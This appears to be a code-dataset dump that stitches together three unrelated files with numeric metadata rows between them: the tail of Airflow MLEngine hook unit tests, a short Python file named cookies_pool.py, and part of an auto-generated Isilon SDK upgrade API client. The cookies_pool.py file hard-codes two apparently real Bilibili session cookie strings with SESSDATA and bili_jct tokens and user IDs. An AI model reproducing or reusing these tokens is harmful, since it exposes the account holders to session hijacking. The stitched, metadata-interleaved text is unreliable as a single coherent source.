            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value.
            list_next.return_value
        ) = None
        self.hook.delete_model(
            project_id=project_id, model_name=model_name, delete_contents=True
        )
        mock_get_conn.assert_has_calls(
            [
                mock.call().projects().models().delete(name=model_path),
                mock.call().projects().models().delete().execute()
            ] + [
                mock.call().projects().models().versions().delete(
                    name='projects/{}/models/{}/versions/{}'.format(project_id, model_name, version_name),
                ) for version_name in version_names
            ],
            any_order=True
        )

    @mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_mlengine_job(self, mock_get_conn, mock_sleep):
        # create_job() labels the job, then polls until the state leaves QUEUED.
        project_id = 'test-project'
        job_id = 'test-job-id'
        project_path = 'projects/{}'.format(project_id)
        job_path = 'projects/{}/jobs/{}'.format(project_id, job_id)
        new_job = {
            'jobId': job_id,
            'foo': 4815162342,
        }
        new_job_with_airflow_version = {
            'jobId': job_id,
            'foo': 4815162342,
            'labels': {'airflow-version': hook._AIRFLOW_VERSION}
        }
        job_succeeded = {
            'jobId': job_id,
            'state': 'SUCCEEDED',
        }
        job_queued = {
            'jobId': job_id,
            'state': 'QUEUED',
        }
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            create.return_value.
            execute.return_value
        ) = job_queued
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            get.return_value.
            execute.side_effect
        ) = [job_queued, job_succeeded]
        create_job_response = self.hook.create_job(
            project_id=project_id, job=deepcopy(new_job)
        )
        self.assertEqual(create_job_response, job_succeeded)
        mock_get_conn.assert_has_calls([
            mock.call().projects().jobs().create(body=new_job_with_airflow_version, parent=project_path),
            mock.call().projects().jobs().get(name=job_path),
            mock.call().projects().jobs().get().execute()
        ], any_order=True)

    @mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_mlengine_job_with_labels(self, mock_get_conn, mock_sleep):
        # Same as above but with pre-existing labels that must be preserved.
        project_id = 'test-project'
        job_id = 'test-job-id'
        project_path = 'projects/{}'.format(project_id)
        job_path = 'projects/{}/jobs/{}'.format(project_id, job_id)
        new_job = {
            'jobId': job_id,
            'foo': 4815162342,
            'labels': {'other-label': 'test-value'}
        }
        new_job_with_airflow_version = {
            'jobId': job_id,
            'foo': 4815162342,
            'labels': {
                'other-label': 'test-value',
                'airflow-version': hook._AIRFLOW_VERSION
            }
        }
        job_succeeded = {
            'jobId': job_id,
            'state': 'SUCCEEDED',
        }
        job_queued = {
            'jobId': job_id,
            'state': 'QUEUED',
        }
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            create.return_value.
            execute.return_value
        ) = job_queued
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            get.return_value.
            execute.side_effect
        ) = [job_queued, job_succeeded]
        create_job_response = self.hook.create_job(
            project_id=project_id, job=deepcopy(new_job)
        )
        self.assertEqual(create_job_response, job_succeeded)
        mock_get_conn.assert_has_calls([
            mock.call().projects().jobs().create(body=new_job_with_airflow_version, parent=project_path),
            mock.call().projects().jobs().get(name=job_path),
            mock.call().projects().jobs().get().execute()
        ], any_order=True)

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_mlengine_job_reuse_existing_job_by_default(self, mock_get_conn):
        # On 409 (job exists) the hook fetches and reuses the existing job.
        project_id = 'test-project'
        job_id = 'test-job-id'
        project_path = 'projects/{}'.format(project_id)
        job_path = 'projects/{}/jobs/{}'.format(project_id, job_id)
        job_succeeded = {
            'jobId': job_id,
            'foo': 4815162342,
            'state': 'SUCCEEDED',
        }
        error_job_exists = HttpError(resp=mock.MagicMock(status=409), content=b'Job already exists')
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            create.return_value.
            execute.side_effect
        ) = error_job_exists
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            get.return_value.
            execute.return_value
        ) = job_succeeded
        create_job_response = self.hook.create_job(
            project_id=project_id, job=job_succeeded)
        self.assertEqual(create_job_response, job_succeeded)
        mock_get_conn.assert_has_calls([
            mock.call().projects().jobs().create(body=job_succeeded, parent=project_path),
            mock.call().projects().jobs().create().execute(),
            mock.call().projects().jobs().get(name=job_path),
            mock.call().projects().jobs().get().execute()
        ], any_order=True)

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_mlengine_job_check_existing_job_failed(self, mock_get_conn):
        # If use_existing_job_fn rejects the existing job, the original 409
        # HttpError must propagate.
        project_id = 'test-project'
        job_id = 'test-job-id'
        my_job = {
            'jobId': job_id,
            'foo': 4815162342,
            'state': 'SUCCEEDED',
            'someInput': {
                'input': 'someInput'
            }
        }
        different_job = {
            'jobId': job_id,
            'foo': 4815162342,
            'state': 'SUCCEEDED',
            'someInput': {
                'input': 'someDifferentInput'
            }
        }
        error_job_exists = HttpError(resp=mock.MagicMock(status=409), content=b'Job already exists')
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            create.return_value.
            execute.side_effect
        ) = error_job_exists
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            get.return_value.
            execute.return_value
        ) = different_job

        def check_input(existing_job):
            # Accept only jobs whose 'someInput' matches ours.
            return existing_job.get('someInput', None) == \
                my_job['someInput']
        with self.assertRaises(HttpError):
            self.hook.create_job(
                project_id=project_id, job=my_job,
                use_existing_job_fn=check_input)

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_mlengine_job_check_existing_job_success(self, mock_get_conn):
        # If use_existing_job_fn accepts the existing job, it is returned.
        project_id = 'test-project'
        job_id = 'test-job-id'
        my_job = {
            'jobId': job_id,
            'foo': 4815162342,
            'state': 'SUCCEEDED',
            'someInput': {
                'input': 'someInput'
            }
        }
        error_job_exists = HttpError(resp=mock.MagicMock(status=409), content=b'Job already exists')
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            create.return_value.
            execute.side_effect
        ) = error_job_exists
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            get.return_value.
            execute.return_value
        ) = my_job

        def check_input(existing_job):
            return existing_job.get('someInput', None) == my_job['someInput']
        create_job_response = self.hook.create_job(
            project_id=project_id, job=my_job,
            use_existing_job_fn=check_input)
        self.assertEqual(create_job_response, my_job)
class TestMLEngineHookWithDefaultProjectId(unittest.TestCase):
    """Same hook operations, but relying on the connection's default project.

    ``CloudBaseHook.project_id`` is patched (PropertyMock) to return
    GCP_PROJECT_ID_HOOK_UNIT_TEST, so the hook methods are called WITHOUT an
    explicit ``project_id`` argument and must fall back to the default.
    """

    def setUp(self) -> None:
        super().setUp()
        # Replace the base-hook constructor with one that supplies a default
        # project id (no real GCP connection is created).
        with mock.patch(
            'airflow.gcp.hooks.mlengine.MLEngineHook.__init__',
            new=mock_base_gcp_hook_default_project_id,
        ):
            self.hook = hook.MLEngineHook()

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_version(self, mock_get_conn, mock_project_id):
        model_name = 'test-model'
        version_name = 'test-version'
        version = {'name': version_name}
        operation_path = 'projects/{}/operations/test-operation'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST)
        model_path = 'projects/{}/models/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name)
        operation_done = {'name': operation_path, 'done': True}
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value.
            create.return_value.
            execute.return_value
        ) = version
        (
            mock_get_conn.return_value.
            projects.return_value.
            operations.return_value.
            get.return_value.
            execute.return_value
        ) = {'name': operation_path, 'done': True}
        create_version_response = self.hook.create_version(
            model_name=model_name,
            version_spec=version
        )
        self.assertEqual(create_version_response, operation_done)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().versions().create(body=version, parent=model_path),
            mock.call().projects().models().versions().create().execute(),
            mock.call().projects().operations().get(name=version_name),
        ], any_order=True)

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_set_default_version(self, mock_get_conn, mock_project_id):
        model_name = 'test-model'
        version_name = 'test-version'
        operation_path = 'projects/{}/operations/test-operation'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST)
        version_path = 'projects/{}/models/{}/versions/{}'.format(
            GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name, version_name
        )
        operation_done = {'name': operation_path, 'done': True}
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value.
            setDefault.return_value.
            execute.return_value
        ) = operation_done
        set_default_version_response = self.hook.set_default_version(
            model_name=model_name,
            version_name=version_name
        )
        self.assertEqual(set_default_version_response, operation_done)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().versions().setDefault(body={}, name=version_path),
            mock.call().projects().models().versions().setDefault().execute()
        ], any_order=True)

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
    )
    @mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_list_versions(self, mock_get_conn, mock_sleep, mock_project_id):
        # Pagination identical to the explicit-project variant; see
        # TestMLEngineHook.test_list_versions for the page layout.
        model_name = 'test-model'
        model_path = 'projects/{}/models/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name)
        version_names = ['ver_{}'.format(ix) for ix in range(3)]
        response_bodies = [
            {
                'nextPageToken': "TOKEN-{}".format(ix),
                'versions': [ver]
            } for ix, ver in enumerate(version_names)]
        response_bodies[-1].pop('nextPageToken')
        pages_requests = [
            mock.Mock(**{'execute.return_value': body}) for body in response_bodies
        ]
        versions_mock = mock.Mock(
            **{'list.return_value': pages_requests[0], 'list_next.side_effect': pages_requests[1:] + [None]}
        )
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value
        ) = versions_mock
        list_versions_response = self.hook.list_versions(model_name=model_name)
        self.assertEqual(list_versions_response, version_names)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().versions().list(pageSize=100, parent=model_path),
            mock.call().projects().models().versions().list().execute(),
        ] + [
            mock.call().projects().models().versions().list_next(
                previous_request=pages_requests[i], previous_response=response_bodies[i]
            ) for i in range(3)
        ], any_order=True)

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_delete_version(self, mock_get_conn, mock_project_id):
        model_name = 'test-model'
        version_name = 'test-version'
        operation_path = 'projects/{}/operations/test-operation'.format(
            GCP_PROJECT_ID_HOOK_UNIT_TEST
        )
        version_path = 'projects/{}/models/{}/versions/{}'.format(
            GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name, version_name
        )
        version = {'name': operation_path}
        operation_not_done = {'name': operation_path, 'done': False}
        operation_done = {'name': operation_path, 'done': True}
        (
            mock_get_conn.return_value.
            projects.return_value.
            operations.return_value.
            get.return_value.
            execute.side_effect
        ) = [operation_not_done, operation_done]
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value.
            delete.return_value.
            execute.return_value
        ) = version
        delete_version_response = self.hook.delete_version(model_name=model_name, version_name=version_name)
        self.assertEqual(delete_version_response, operation_done)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().versions().delete(name=version_path),
            mock.call().projects().models().versions().delete().execute(),
            mock.call().projects().operations().get(name=operation_path),
            mock.call().projects().operations().get().execute()
        ], any_order=True)

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_model(self, mock_get_conn, mock_project_id):
        model_name = 'test-model'
        model = {
            'name': model_name,
        }
        project_path = 'projects/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST)
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            create.return_value.
            execute.return_value
        ) = model
        create_model_response = self.hook.create_model(model=model)
        self.assertEqual(create_model_response, model)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().create(body=model, parent=project_path),
            mock.call().projects().models().create().execute()
        ])

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_get_model(self, mock_get_conn, mock_project_id):
        model_name = 'test-model'
        model = {'model': model_name}
        model_path = 'projects/{}/models/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name)
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            get.return_value.
            execute.return_value
        ) = model
        get_model_response = self.hook.get_model(model_name=model_name)
        self.assertEqual(get_model_response, model)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().get(name=model_path),
            mock.call().projects().models().get().execute()
        ])

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_delete_model(self, mock_get_conn, mock_project_id):
        model_name = 'test-model'
        model = {'model': model_name}
        model_path = 'projects/{}/models/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST, model_name)
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            delete.return_value.
            execute.return_value
        ) = model
        self.hook.delete_model(model_name=model_name)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().delete(name=model_path),
            mock.call().projects().models().delete().execute()
        ])

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
    )
    @mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_mlengine_job(self, mock_get_conn, mock_sleep, mock_project_id):
        # Job creation + polling with the default project id.
        job_id = 'test-job-id'
        project_path = 'projects/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST)
        job_path = 'projects/{}/jobs/{}'.format(GCP_PROJECT_ID_HOOK_UNIT_TEST, job_id)
        new_job = {
            'jobId': job_id,
            'foo': 4815162342,
        }
        job_succeeded = {
            'jobId': job_id,
            'state': 'SUCCEEDED',
        }
        job_queued = {
            'jobId': job_id,
            'state': 'QUEUED',
        }
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            create.return_value.
            execute.return_value
        ) = job_queued
        (
            mock_get_conn.return_value.
            projects.return_value.
            jobs.return_value.
            get.return_value.
            execute.side_effect
        ) = [job_queued, job_succeeded]
        create_job_response = self.hook.create_job(job=new_job)
        self.assertEqual(create_job_response, job_succeeded)
        mock_get_conn.assert_has_calls([
            mock.call().projects().jobs().create(body=new_job, parent=project_path),
            mock.call().projects().jobs().get(name=job_path),
            mock.call().projects().jobs().get().execute()
        ], any_order=True)
class TestMLEngineHookWithoutProjectId(unittest.TestCase):
    """Every MLEngineHook operation must raise AirflowException when no
    GCP project id is configured on the connection."""

    def setUp(self) -> None:
        super().setUp()
        # Build the hook with a stub __init__ so no default project id is set.
        init_patch = mock.patch(
            'airflow.gcp.hooks.mlengine.MLEngineHook.__init__',
            new=mock_base_gcp_hook_no_default_project_id,
        )
        with init_patch:
            self.hook = hook.MLEngineHook()

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_version(self, mock_get_conn, mock_project_id):
        """create_version without a project id must fail."""
        version_spec = {'name': 'test-version'}
        with self.assertRaises(AirflowException):
            self.hook.create_version(
                model_name='test-model', version_spec=version_spec)

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_set_default_version(self, mock_get_conn, mock_project_id):
        """set_default_version without a project id must fail."""
        with self.assertRaises(AirflowException):
            self.hook.set_default_version(
                model_name='test-model', version_name='test-version')

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_list_versions(self, mock_get_conn, mock_sleep, mock_project_id):
        """list_versions without a project id must fail."""
        with self.assertRaises(AirflowException):
            self.hook.list_versions(model_name='test-model')

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_delete_version(self, mock_get_conn, mock_project_id):
        """delete_version without a project id must fail."""
        with self.assertRaises(AirflowException):
            self.hook.delete_version(
                model_name='test-model', version_name='test-version')

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_model(self, mock_get_conn, mock_project_id):
        """create_model without a project id must fail."""
        model_body = {
            'name': 'test-model',
        }
        with self.assertRaises(AirflowException):
            self.hook.create_model(model=model_body)

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_get_model(self, mock_get_conn, mock_project_id):
        """get_model without a project id must fail."""
        with self.assertRaises(AirflowException):
            self.hook.get_model(model_name='test-model')

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_delete_model(self, mock_get_conn, mock_project_id):
        """delete_model without a project id must fail."""
        with self.assertRaises(AirflowException):
            self.hook.delete_model(model_name='test-model')

    @mock.patch(
        'airflow.gcp.hooks.base.CloudBaseHook.project_id',
        new_callable=PropertyMock,
        return_value=None
    )
    @mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_mlengine_job(self, mock_get_conn, mock_sleep, mock_project_id):
        """create_job without a project id must fail."""
        new_job = {
            'jobId': 'test-job-id',
            'foo': 4815162342,
        }
        with self.assertRaises(AirflowException):
            self.hook.create_job(job=new_job)
| 36.630728
| 108
| 0.615036
| 4,524
| 40,770
| 5.225464
| 0.049735
| 0.094924
| 0.042343
| 0.049027
| 0.933249
| 0.925846
| 0.922166
| 0.910152
| 0.892555
| 0.888156
| 0
| 0.004514
| 0.271891
| 40,770
| 1,112
| 109
| 36.663669
| 0.791848
| 0.018445
| 0
| 0.780186
| 0
| 0
| 0.137647
| 0.089298
| 0
| 0
| 0
| 0
| 0.054696
| 1
| 0.039216
| false
| 0
| 0.008256
| 0.002064
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c49f0c5a15633edcfe699fb2096659bd7082f38
| 692
|
py
|
Python
|
cookies_pool.py
|
yamadadada/yamada-spider
|
ce6cffb2994a0ab65f1e0cba38b223825e9a1f76
|
[
"MIT"
] | null | null | null |
cookies_pool.py
|
yamadadada/yamada-spider
|
ce6cffb2994a0ab65f1e0cba38b223825e9a1f76
|
[
"MIT"
] | null | null | null |
cookies_pool.py
|
yamadadada/yamada-spider
|
ce6cffb2994a0ab65f1e0cba38b223825e9a1f76
|
[
"MIT"
] | null | null | null |
# Pool of pre-authenticated session-cookie strings the spider rotates through.
# SECURITY NOTE(review): these are hard-coded live credentials (SESSDATA /
# bili_jct session tokens with account ids).  They should be loaded from an
# environment variable or a secrets store, not committed to source control,
# and they expire (SESSDATA embeds an expiry timestamp) — rotate them out.
cookies_pool = [
    "JSESSIONID=36B4E30CDFE059235541CC81C91743A3; bili_jct=520c3f01daf4d9732fdeb9d95586612c; SESSDATA=4b484445%2C1616518159%2Ca3c73*91; DedeUserID=416679427; sid=7r9xx2ji; buvid3=CDCFA651-49CB-4A84-B114-D107F6AD0B2E138364infoc; DedeUserID__ckMd5=a64ed305aa816673; _uuid=A60FD75F-122D-851F-7994-2DD11583170748070infoc; finger=158939783",
    "JSESSIONID=F226418244D87B8BA9576F6925A77DEE; bili_jct=39e4699e907b32e2102d5bf649efc608; SESSDATA=ff19c0a2%2C1616518648%2Ca1be7*91; DedeUserID=416679530; sid=8ud5j0dx; buvid3=CDCFA651-49CB-4A84-B114-D107F6AD0B2E138364infoc; DedeUserID__ckMd5=a86b9ac2fc85db23; _uuid=98868A14-C781-7EF4-B8AB-CBF11A860D7B41053infoc; finger=158939783"
]
| 138.4
| 336
| 0.864162
| 64
| 692
| 9.203125
| 0.703125
| 0.023769
| 0.061121
| 0.074703
| 0.217317
| 0.217317
| 0.217317
| 0.217317
| 0
| 0
| 0
| 0.444109
| 0.043353
| 692
| 4
| 337
| 173
| 0.445619
| 0
| 0
| 0
| 0
| 0.5
| 0.950867
| 0.843931
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c60d2a864031e5b1cd3ff7afa47f867bcd19a1b
| 102,162
|
py
|
Python
|
isi_sdk_8_2_2/isi_sdk_8_2_2/api/upgrade_api.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24
|
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_8_2_2/isi_sdk_8_2_2/api/upgrade_api.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46
|
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_8_2_2/isi_sdk_8_2_2/api/upgrade_api.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29
|
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from isi_sdk_8_2_2.api_client import ApiClient
class UpgradeApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_cluster_add_remaining_node(self, cluster_add_remaining_node, **kwargs): # noqa: E501
"""create_cluster_add_remaining_node # noqa: E501
Let system absorb any remaining or new nodes inside the existing upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_add_remaining_node(cluster_add_remaining_node, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_add_remaining_node: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_add_remaining_node_with_http_info(cluster_add_remaining_node, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_add_remaining_node_with_http_info(cluster_add_remaining_node, **kwargs) # noqa: E501
return data
def create_cluster_add_remaining_node_with_http_info(self, cluster_add_remaining_node, **kwargs): # noqa: E501
"""create_cluster_add_remaining_node # noqa: E501
Let system absorb any remaining or new nodes inside the existing upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_add_remaining_node_with_http_info(cluster_add_remaining_node, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_add_remaining_node: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_add_remaining_node'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_add_remaining_node" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_add_remaining_node' is set
if ('cluster_add_remaining_node' not in params or
params['cluster_add_remaining_node'] is None):
raise ValueError("Missing the required parameter `cluster_add_remaining_node` when calling `create_cluster_add_remaining_node`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_add_remaining_node' in params:
body_params = params['cluster_add_remaining_node']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/add_remaining_nodes', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_archive_item(self, cluster_archive_item, **kwargs): # noqa: E501
"""create_cluster_archive_item # noqa: E501
Start an archive of an upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_archive_item(cluster_archive_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterArchiveItem cluster_archive_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_archive_item_with_http_info(cluster_archive_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_archive_item_with_http_info(cluster_archive_item, **kwargs) # noqa: E501
return data
def create_cluster_archive_item_with_http_info(self, cluster_archive_item, **kwargs): # noqa: E501
"""create_cluster_archive_item # noqa: E501
Start an archive of an upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_archive_item_with_http_info(cluster_archive_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterArchiveItem cluster_archive_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_archive_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_archive_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_archive_item' is set
if ('cluster_archive_item' not in params or
params['cluster_archive_item'] is None):
raise ValueError("Missing the required parameter `cluster_archive_item` when calling `create_cluster_archive_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_archive_item' in params:
body_params = params['cluster_archive_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/archive', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
